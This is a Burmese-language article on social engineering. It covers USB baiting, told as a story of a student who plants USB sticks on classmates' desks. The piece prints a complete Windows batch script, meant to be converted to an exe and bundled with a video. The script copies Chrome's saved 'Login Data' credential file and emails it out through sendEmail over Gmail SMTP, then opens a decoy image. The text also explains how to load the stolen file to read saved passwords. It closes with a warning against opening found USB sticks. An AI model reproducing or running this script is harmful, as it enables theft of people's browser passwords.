လူသိမ်ားတဲ့ Social Engineering နည္းလမ္းမ်ား

ကြ်မ္းက်င္တဲ့ အင္ဂ်င္နီယာတစ္ေယာက္က လက္ရွိၿပႆနာတစ္ခုကုိ ေၿဖရွင္းဖုိ႔နည္းလမ္းရွာသစ္ေတြရွာေဖြေတြ႔ရွိၿခင္းကုိ ဟက္ကင္း တစ္ခုလုိ႔ေခၚႏုိင္ပါတယ္ – http://schoolforhackers.com/category/hacking-tools/ မွ ကုိးကားေဖၚၿပထားတဲ့ Hack to live ဆုိတဲ့ ေဆာင္းပါးတစ္ခုမွာ ပုိမိုဖတ္ၾကည့္ႏုိင္ပါတယ္။ ေသခ်ာတာက ခင္ဗ်ားလုိခ်င္တာ၊ ၿဖစ္ေစခ်င္တာကုိ ရေအာင္ရယူတဲ့၊ ၿဖစ္ေအာင္လုပ္တဲ့ နည္းလမ္းရွာေဖြ လုိက္တာပဲေပါ့။ အသံုးမ်ားတဲ့ social engineering နည္းလမ္း ၅ ခုေလာက္ေဆြးေႏြးၾကည့္ရေအာင္။

၁။ ငါးစာခ်ၿခင္း (biating)

               ငါးစားခ်ၿခင္းလုိ႔ တင္စားထားတာပါ။ ထုိနည္းလမ္းက ငါးမွ်ားၿခင္းလုိ႔သိႏုိင္တဲ့ Phishing နည္းလမ္းနဲ႔ တူပါတယ္။ အၿခား social engineering ေတြနဲ႔ ကြာၿခားခ်က္ကေတာ့၊ ဟက္ကာက ပစ္မွတ္ကုိ ၿဖားေယာင္းရန္ အသံုးၿပဳတဲ့ အခ်က္ေတြပါပဲ။ baiter ေတြက သီခ်င္းေတြ၊ ရုပ္ရွင္ေတြ အခမဲ့ေဒါင္းလုတ္ လုပ္ႏုိင္ရန္ ကမ္းလွမ္းေပးတတ္ၾကပါတယ္။ ထုိနည္းလမ္းက တုိက္ခိုက္သူေတြက လူေတြရဲ႕ စပ္စုခ်င္စိတ္ ေပၚမွာ ရုပ္၀တၳဳၾကားခံေတြ သံုးၿပီး တုိက္ခုိက္တဲ့ နည္းလမ္းတစ္ခုၿဖစ္ပါတယ္။

ကစားပြဲစတင္

မင္းေမာင္ေမာင္က ယူအက္စ္ဘီ စတစ္ေလးေတြကုိ သူ႔အခန္းေဖါ္ေတြရဲ႕ စားပြဲနားမွာ၊ လက္ေတြ႔ခန္း ၀န္းက်င္မွာ ခ်ထားခဲ့ ပါတယ္။ သူအခန္းေဖၚတစ္ေယာက္က ယူအက္စဘီ စတစ္ေလးကုိ ေကာက္ယူထားၿပီး ဘာေတြမ်ားပါမလဲလုိ႔ သူ႔ လပ္ေတာ့ခ္မွာ ဖြင့္ၾကည့္ လုိက္ပါတယ္ ။  ။  “ဟာ သီခ်င္းေတြအမ်ားၾကီးပဲ၊ ဗြီဒီယုိေတြလည္းပါတယ္၊ ပြတာပဲေဟ့။ ဒီမွာ စိတ္၀င္စားစရာ ဗြီဒီယိုက “ငါ့ အေၾကာင္း” ဆုိပါလား ဖြင့္ၾကည့္လုိက္ဦးမယ္ ဘယ္သူ႔ စတစ္ဆိုတာသိရတာေပါ့။” အခန္းေဖၚက ေရရြတ္ရင္း ဗီြဒီယုိေလးကုိ ဖြင့္ၾကည့္ လုိက္ပါတယ္။ မင္းေမာင္ေမာင္က “အဖုိးေရကြ်န္ေတာ္ အဲဒီ စတစ္ထဲမွာထည့္ထားတဲ့ ဗြီဒီယိုဖုိင္နဲ႔ တဲြခ်ိတ္ထားတဲ့ ငါးမ်ွားခ်ိတ္ကေတာ့ ။ ။ batch ဖုိင္ေလးတစ္ဖုိင္ပါပဲ၊ အဲဒီဖုိင္ထဲမွာ –

@echo off
 
color 08
 
mkdir \a C:\Users\%username%\Documents\sm
 
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
 
PATH=%path%; C:\Users\%username%\Documents\sm
 
cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\
 
xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C
 
cd C:\Users\%username%\Documents\
 
copy /Y “Login Data” LoginData
 
cd C:\Users\%username%\Documents\sm\
 
sendEmail -f from@gmail.com -u subject -m Message Body -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes
 
start http://www.animateit.net/data/media/feb2013/love_roses_03.gif

 

ဒီ windows script ေလးတစ္ခ်ိဳ႕ေရးထားတယ္၊ ၿပီးေတာ့ bat to exe ေၿပာင္းၿပီး sendEmail.exe ရယ္၊ ဗီြဒီယိုဖုိင္ တစ္ဖုိင္ရယ္နဲ႔ တြဲ ထားလုိက္တယ္။ သိပ္မၾကာခင္၊ သူ႔ရဲ႕ Google Chrome ထဲက LoginData ဖုိင္ကို ကြ်န္ေတာ္ရေတာ့မယ္၊ တကယ္လုိ႔ သူက browser မွာ စကား၀ွက္ေတြ သိမ္းထားရင္ေတာ့၊ သူ႔ logindata ဖုိင္ကုိ ကြ်န္ေတာ့ Google Chrome Profile ထဲ ထည့္လုိက္ရင္ သူ့ browser မွာ သိမ္းထားတဲ့ စကား၀ွက္ေတြ ရေတာ့မွာေပါ့ဗ်ာ။” လုိ႔ ကြန္ၿပဴတာ ဖန္သားၿပင္ေပၚမွာ စုိက္ၾကည့္ရင္း ေၿပာလုိက္ပါတယ္။

ကစားပြဲၿပီးဆံုး           

 ဒါေပါ့ဗ်ာ၊ ယူအက္စ္ဘီေလး ေကာက္ရတယ္ဆုိၿပီး၊ မစပ္စု သင့္ပါဘူး။ ေဖၚၿပထားတဲ့ script ေလးက၊ အေပ်ာ္တမ္းဆုိေပမယ့္၊ အၿပင္မွာ တစ္ကယ္ရည္ရြယ္ခ်က္ရွိရွိ တုိက္ခုိက္ေနတဲ့ တုိက္ခုိက္သူေတြ တကယ္ရွိေနတယ္ဆုိတာ သတိထားသင့္ပါတယ္။